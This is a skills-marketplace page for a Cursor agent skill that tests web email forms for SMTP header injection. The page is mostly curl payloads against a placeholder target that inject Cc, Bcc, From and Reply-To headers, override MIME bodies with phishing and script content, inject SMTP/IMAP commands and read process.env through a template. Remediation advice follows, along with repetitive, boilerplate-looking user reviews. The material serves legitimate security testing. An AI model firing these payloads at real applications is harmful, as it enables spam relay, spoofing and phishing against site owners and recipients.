Test web application email functionality for SMTP header injection vulnerabilities that allow attackers to inject additional email headers, modify recipients, and abuse contact forms for spam relay.
Works with
AI-first code editor with Composer
Before installing skills in Cursor, ensure your development environment meets these requirements:
node --versiontesting-for-email-header-injectionExecute the skills CLI command in your project's root directory to begin installation:
Fetches testing-for-email-header-injection from mukul975/Anthropic-Cybersecurity-Skills and configures it for Cursor.
The CLI shows a list of agents. Use arrow keys and space to select Cursor:
Confirm successful installation by checking the skill directory location:
Restart Cursor to activate testing-for-email-header-injection. Access via /testing-for-email-header-injection in your agent's command palette.
We perform automated surface-level scans (Gen AI Scanner, Socket, Snyk) during installation. These checks detect common vulnerabilities but do not guarantee complete security. Always review skill source code and verify the publisher's reputation before production use.
Skills execute code in your environment. Always review source, verify the publisher, and test in isolation before production.
Submit your Claude Code skill and start earning
Automate repetitive workflows and reduce manual effort
Example
Generate reports, summarize documents, draft communications
Save 3-5 hours per week on routine tasks
Learn new skills, understand complex topics, get expert guidance
Example
Explain concepts, provide examples, suggest learning resources
Accelerate learning and skill development by 2x
Enhance output quality through reviews, suggestions, and refinements
Example
Review drafts, suggest improvements, catch errors
Improve work quality by 30-40% with less effort
0
total installs
0
this week
8.6K
GitHub stars
0
upvotes
Run in your terminal
0
installs
0
this week
8.6K
stars
| name | testing-for-email-header-injection |
| description | Test web application email functionality for SMTP header injection vulnerabilities that allow attackers to inject additional email headers, modify recipients, and abuse contact forms for spam relay. |
| domain | cybersecurity |
| subdomain | web-application-security |
| tags | - email-injection - smtp-injection - crlf-injection - header-injection - spam-relay - contact-form - email-security |
| version | '1.0' |
| author | mahipal |
| license | Apache-2.0 |
| nist_csf | - PR.PS-01 - ID.RA-01 - PR.DS-10 - DE.CM-01 |
# Identify form fields that end up in email headers:
# - "From" name or email address fields
# - "To" or "CC" fields in sharing features
# - Subject line inputs
# - Reply-To fields
# Common endpoints:
# POST /contact - Contact forms
# POST /share - Share via email features
# POST /invite - Invitation systems
# POST /api/send-email - Email API endpoints
# POST /forgot-password - Password reset forms
# Test basic functionality first
curl -X POST http://target.com/contact \
-d "name=Test&[email protected]&subject=Hello&message=Test message"
# Inject additional email headers via CRLF in the email field
curl -X POST http://target.com/contact \
-d "name=Test&[email protected]%0ACc:[email protected]&message=Test"
# Inject BCC header
curl -X POST http://target.com/contact \
-d "name=Test&[email protected]%0ABcc:[email protected]&message=Test"
# Inject via the name field
curl -X POST http://target.com/contact \
-d "name=Test%0ACc:[email protected]&[email protected]&message=Test"
# Inject via subject field
curl -X POST http://target.com/contact \
-d "name=Test&[email protected]&subject=Hello%0ABcc:[email protected]&message=Test"
# Try different CRLF encoding variants
# %0D%0A (CRLF)
curl -X POST http://target.com/contact \
-d "[email protected]%0D%0ACc:[email protected]"
# %0A (LF only)
curl -X POST http://target.com/contact \
-d "[email protected]%0ACc:[email protected]"
# %0D (CR only)
curl -X POST http://target.com/contact \
-d "[email protected]%0DCc:[email protected]"
# Double encoding
curl -X POST http://target.com/contact \
-d "[email protected]%250ACc:[email protected]"
# Override email body by injecting Content-Type and body
curl -X POST http://target.com/contact \
-d "[email protected]%0AContent-Type:text/html%0A%0A<h1>Phishing</h1>"
# Inject additional MIME parts
curl -X POST http://target.com/contact \
-d "[email protected]%0AContent-Type:multipart/mixed;boundary=boundary123%0A--boundary123%0AContent-Type:text/html%0A%0A<script>alert(1)</script>"
# Override From header for email spoofing
curl -X POST http://target.com/contact \
-d "[email protected]%0AFrom:[email protected]"
# Inject Reply-To for phishing
curl -X POST http://target.com/contact \
-d "[email protected]%0AReply-To:[email protected]"
# IMAP command injection via email field
curl -X POST http://target.com/webmail/search \
-d "query=test%0AEXAMINE INBOX"
# SMTP command injection
curl -X POST http://target.com/api/send \
-d "[email protected]%0ARCPT TO:[email protected]"
# SMTP VRFY command injection
curl -X POST http://target.com/api/verify \
-d "[email protected]%0AVRFY admin"
# Test SMTP relay abuse
curl -X POST http://target.com/contact \
-d "[email protected]%0ATo:[email protected]%0ATo:[email protected]%0ATo:[email protected]"
# JSON API header injection
curl -X POST http://target.com/api/send-email \
-H "Content-Type: application/json" \
-d '{"to":"[email protected]\nCc:[email protected]","subject":"Test","body":"Test"}'
# Array injection for multiple recipients
curl -X POST http://target.com/api/send-email \
-H "Content-Type: application/json" \
-d '{"to":["[email protected]","[email protected]"],"subject":"Test","body":"Test"}'
# Template injection in email body
curl -X POST http://target.com/api/send-email \
-H "Content-Type: application/json" \
-d '{"to":"[email protected]","subject":"Test","body":"{{constructor.constructor(\"return process.env\")()}}"}'
# Check if injected CC/BCC emails were received
# Monitor [email protected] inbox for received copies
# Verify header injection via email raw source
# In received email, check "View Original" or "Show Headers"
# Look for injected Cc:, Bcc:, From:, or Reply-To: headers
# Test if the application is usable as a spam relay
# by injecting multiple recipients in BCC
# Document the full injection chain
# 1. Injection point (which field)
# 2. Encoding required (CRLF, URL encoding)
# 3. Impact (spam relay, phishing, data theft)
| Concept | Description |
|---|---|
| CRLF Injection | Injecting carriage return and line feed characters to create new email headers |
| Header Injection | Adding unauthorized headers (Cc, Bcc, From) to outgoing emails |
| Spam Relay | Abusing email functionality to send spam to arbitrary recipients |
| Email Spoofing | Modifying From or Reply-To headers to impersonate trusted senders |
| MIME Manipulation | Injecting MIME boundaries to override email body content |
| SMTP Command Injection | Injecting raw SMTP commands through unsanitized email parameters |
| Newline Characters | \r\n (CRLF), \n (LF), \r (CR) used to separate email headers |
| Tool | Purpose |
|---|---|
| Burp Suite | HTTP proxy for modifying email-related form submissions |
| swaks | Swiss Army Knife for SMTP testing and header injection validation |
| OWASP ZAP | Automated scanner with email injection detection |
| mailhog | Local SMTP testing server for capturing injected emails |
| smtp4dev | Development SMTP server for monitoring email injection results |
| Nuclei | Template scanner with email header injection detection templates |
## Email Header Injection Report
- **Target**: http://target.com/contact
- **Injection Point**: email field in contact form
- **Encoding Required**: URL-encoded LF (%0A)
### Findings
| # | Field | Payload | Result | Severity |
|---|-------|---------|--------|----------|
| 1 | email | [email protected]%0ACc:[email protected] | CC header injected | High |
| 2 | email | [email protected]%0ABcc:[email protected] | BCC header injected | High |
| 3 | name | Test%0AFrom:[email protected] | From spoofing | Medium |
### Remediation
- Validate email addresses with strict regex rejecting newline characters
- Strip \r, \n, and encoded variants from all email-related input
- Use parameterized email APIs that separate headers from data
- Implement rate limiting on email-sending functionality
Prerequisites
Time Estimate
15-45 minutes depending on use case complexity
Steps
Common Pitfalls
✓ Do
✗ Don't
💡 Pro Tips
✓ Use when
Use when skill capabilities match your task, clear ROI on time saved, and you can validate outputs. Best for repetitive tasks, learning, and quality improvement.
✗ Avoid when
Avoid when task requires deep expertise you can't validate, involves sensitive decisions, or when learning process is more valuable than speed of completion.
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
testing-for-email-header-injection is among the better-maintained entries we tried; worth keeping pinned for repeat workflows.
testing-for-email-header-injection has been reliable in day-to-day use. Documentation quality is above average for community skills.
testing-for-email-header-injection reduced setup friction for our internal harness; good balance of opinion and flexibility.
Useful defaults in testing-for-email-header-injection — fewer surprises than typical one-off scripts, and it plays nicely with `npx skills` flows.
Solid pick for teams standardizing on skills: testing-for-email-header-injection is focused, and the summary matches what you get after install.
testing-for-email-header-injection reduced setup friction for our internal harness; good balance of opinion and flexibility.
testing-for-email-header-injection has been reliable in day-to-day use. Documentation quality is above average for community skills.
I recommend testing-for-email-header-injection for anyone iterating fast on agent tooling; clear intent and a small, reviewable surface area.
Solid pick for teams standardizing on skills: testing-for-email-header-injection is focused, and the summary matches what you get after install.
testing-for-email-header-injection reduced setup friction for our internal harness; good balance of opinion and flexibility.
showing 1-10 of 45